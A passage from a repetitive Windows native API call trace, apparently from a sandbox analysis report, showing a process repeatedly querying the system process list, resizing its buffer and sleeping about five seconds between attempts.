returned 0x0 [0258.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.004] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.057] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 